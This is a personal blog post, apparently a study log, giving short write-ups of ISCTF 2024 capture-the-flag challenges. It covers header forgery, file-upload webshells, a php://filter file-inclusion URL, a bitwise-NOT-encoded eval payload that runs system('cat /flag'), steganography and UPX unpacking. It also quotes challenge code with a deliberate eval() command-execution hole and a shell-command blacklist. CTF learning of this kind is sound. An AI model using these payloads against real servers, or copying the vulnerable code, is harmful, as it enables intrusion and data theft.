1.16学习记录

发布于:2025-02-10 ⋅ 阅读:(82) ⋅ 点赞:(0)

web

2024isctf 25时晓山瑞希生日会

在这里插入图片描述根据提示需要构造客户端请求,用bp抓包构造
在这里插入图片描述提示只能从本地来,构造xff
在这里插入图片描述又提示时间不对,去查了一下时间是8月27日,就伪造一个时间头在这里插入图片描述提示要rfc 822的形式,去查了一下,加上年份,时间随便输一个就行
在这里插入图片描述

2024isctf UP!UPloader

打开题目是一个文件上传的题目,先传马
在这里插入图片描述提示路径没给,要自己找,这里就构造php伪协议读取源码

http://gz.imxbt.cn:20219/include.php?filename=php://filter/convert.base64-encode/resource=upload.php

在这里插入图片描述用赛博厨师炒一下

<?php
error_reporting(0);
$file = $_FILES['file'];
if (isset($file) && $file['size'] > 0) {
    $ext = pathinfo($file['name'], PATHINFO_EXTENSION);
    $name = pathinfo($file['name'], PATHINFO_FILENAME);
    $dir_name = $name . '.' . $ext;
    $upload_dir = './uploads/';
    if (!is_dir($upload_dir)) {
        mkdir($upload_dir, 0755, true);
    }
    if (move_uploaded_file($file['tmp_name'], $upload_dir . md5($dir_name) . '.' . $ext)) {
        echo "æ–‡ä»¶ä¸Šä¼ æˆåŠŸï¼ä¸è¿‡æ–‡ä»¶è·¯å¾„å¯ä¸å¥½æ‰¾å‘€~什么?什么include.php?我不知道啊。" ;
    } else {
        echo "æ–‡ä»¶å­˜å‚¨å¤±è´¥ï¼ŒæœªçŸ¥åŽŸå› ......";
    }
    die();
}
?>

从源码里面可以看出,新的文件名是文件名加拓展后进行md5的加密结果,记得加拓展名在这里插入图片描述在这里插入图片描述
但是蚁剑里面找不到,在根目录处打开终端,输入evn查看环境在这里插入图片描述flag在环境里

2024isctf 小蓝鲨的秘密

打开页面跳转到了蓝鲨的官网,但是里面并没有什么信息,根据查询这个题考的是重定向问题在这里插入图片描述用bp抓包重发即可,有两三个这种的URL需要自己重发去判断在这里插入图片描述

2024isctfezrce

代码审计

<?php

error_reporting(0);

if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];

    if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) {
        die("Blocked by security filter!");
    } else {
        eval($cmd);
    }
} else {
    highlight_file(__FILE__);
}

黑名单太多了,就学了一下取反绕过
在这里插入图片描述
exp:

http://gz.imxbt.cn:20250/?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

在这里插入图片描述

misc

2024isctf 少女的秘密花园

解压附件是一张图片在这里插入图片描述用CTF一把梭看一下在这里插入图片描述里面藏了一个压缩包,用binwalk分一下,得到一个压缩包,解压后得到一个文件,放进010看一下在这里插入图片描述是个压缩包,要密码
在这里插入图片描述用工具炸一下在这里插入图片描述解压得到一个txt但是看这个大小应该不是文字,看到文件名带base,猜测是base加密,赛博厨师炒一下在这里插入图片描述得到是png,导出来在这里插入图片描述这个高度应该不对,用CTF一把梭修复在这里插入图片描述根据搜索是盲文在这里插入图片描述在这里插入图片描述手搓一下得到JFJUGVCGPNBTA3LFL4YG4X3GOIZTK2DNGNXH2,随波逐流梭哈了在这里插入图片描述

re

base2024ctf upx mini

先查壳在这里插入图片描述用upx脱壳用ida分析,找主调函数,反汇编在这里插入图片描述
在主调函数中发现加密方式为base64在这里插入图片描述用赛博大厨炒一下在这里插入图片描述这道题的难点在于upx脱壳工具的选择,这道题用exe查壳会有提示在这里插入图片描述用kali里的upx -d脱壳脱不了,用工具脱也脱不了,最后发现只能用最原始的方式脱


网站公告

今日签到

点亮在社区的每一天
去签到